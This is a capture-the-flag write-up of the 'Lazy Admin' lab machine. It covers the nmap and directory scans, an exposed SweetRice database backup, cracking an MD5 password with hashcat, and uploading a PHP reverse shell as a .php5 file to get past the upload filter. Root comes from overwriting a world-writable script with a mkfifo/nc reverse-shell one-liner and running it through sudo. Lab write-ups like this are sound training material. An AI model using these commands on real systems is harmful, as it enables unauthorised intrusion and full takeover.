Lazy Admin

This room can be found .

Nmap

First, we run an nmap scan.

nmap -sV -sC -p- $IP --min-rate=5000

...
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It seems ports 22 & 80 are open. Let's check out port 80.

Checking out the website

Seems like a simple Apache default page. Nothing really interesting. Let's enumerate.

Enumeration

I'll use dirsearch for enumeration.

dirsearch -u http://$IP/

...
301   314B   http://10.10.173.56/content    -> REDIRECTS TO: http://10.10.173.56/content/
403   277B   http://10.10.173.56/server-status
403   277B   http://10.10.173.56/server-status/

Looking at the results, we see a /content directory, let's take a look at it.

Okay, so we have a SweetRice CMS installed, let's take a peek by running another enumeration scan on the /content directory. This time I'll use gobuster.

gobuster dir --wordlist=/usr/share/dirb/wordlists/common.txt --url=http://$IP/content | tee dirb.log

...
/_themes              (Status: 301) [Size: 322] [--> http://10.10.173.56/content/_themes/]
/as                   (Status: 301) [Size: 317] [--> http://10.10.173.56/content/as/]
/attachment           (Status: 301) [Size: 325] [--> http://10.10.173.56/content/attachment/]
/images               (Status: 301) [Size: 321] [--> http://10.10.173.56/content/images/]
/inc                  (Status: 301) [Size: 318] [--> http://10.10.173.56/content/inc/]
/index.php            (Status: 200) [Size: 2198]

Exploring further

It seems we have multiple directories here, let's take a look at the /as one first.

We have a login page, but for now we don't have an account to login with, so let's keep exploring. I want to take a look at the /inc page, it seems interesting.

Well, this seems promising! It appears we have access to quite a lot of files! But what catches my attention is this mysql_backup folder here. If we actually have a MySQL database dump of the website, we might be able to retrieve usernames and passwords.

It turns out we actually have a mysql dump! Let's download and inspect it.

wget http://$IP/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql

Looking inside the sql dump of the database we find some interesting things.

Well what do we have here? A username (either admin or manager) and an encrypted password. The password is probably encrypted with md5 so I'll use hashcat to decrypt it.

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

42f749ade7f9e195bf475f37a44cafcb:P*********3

And just like that, we have our password! Let's try and login with these credentials on the /as page.

Lo and behold, we have access to the admin dashboard! Exploring the dashboard, something peeks my interest, and it it the Data -> Data Import tab.

Gaining access

It looks like we can import files here where the mysql_backup folder is located. With this, we might be able to upload a php reverse shell and gain access to the machine. Let's try to upload one now. I'll use the one provided by Kali, which is located here: /usr/share/webshells/php/php-reverse-shell.php.

I'll edit the IP field with mine and use the 4444 port and upload it. When uploading the file, the website didn't seem to accept php files, so I changed the extension to .php5.

We have successfully uploaded our reverse shell! Let's check the mysql_backup folder once again to see our file.

We indeed have our reverse shell here! To gain access to the machine, all we have to do now is use netcat on our host (nc -nlvp 4444) and execute the reverse shell.

All right! We now have access to the machine as the www-data user. Let's explore first, I'l go to the /home directory to check if the user flag is there.

www-data@THM-Chal:/$ cd /home/
www-data@THM-Chal:/home$ ls
itguy
www-data@THM-Chal:/home$ cd itguy/
www-data@THM-Chal:/home/itguy$ ls
www-data@THM-Chal:/home/itguy$ ls -l
total 56
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Desktop
drwxr-xr-x 2 itguy itguy 4096 Nov 29  2019 Documents
...
-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.pl
-rw-r--r-- 1 itguy itguy 8980 Nov 29  2019 examples.desktop
-rw-rw-r-- 1 itguy itguy   16 Nov 29  2019 mysql_login.txt
-rw-rw-r-- 1 itguy itguy   38 Nov 29  2019 user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt

PrivEsc

Let's see what we can do with our user by running the sudo -l command.

www-data@THM-Chal:/home/itguy$ sudo -l
...
User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

It looks like we can run sudo without password on a backup Perl script located in itguy's home folder, let's take a look inside the script.

cat backup.pl 

#!/usr/bin/perl

system("sh", "/etc/copy.sh");

The script seems to call another script called copy.sh, let's take a look inside.

cat /etc/copy.sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

Uh, okay... For some reason this is a reverse shell... Which we can run as sudo? Let's check if we can edit it.

www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh

We actually can! Let's replace the IP inside the script with our own and initiate a reverse shell as root! I'll use port 4433 this time.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <target_ip> 4433 >/tmp/f" > /etc/copy.sh
sudo /usr/bin/perl /home/itguy/backup.pl

$ nc -lnvp 4433
listening on [any] 4433 ...
connect to [10.8.239.221] from (UNKNOWN) [10.10.95.12] 59774
# id
uid=0(root) gid=0(root) groups=0(root)

We have a root shell! Let's retrieve the flag in the /root directory.

# cd /root
# ls
root.txt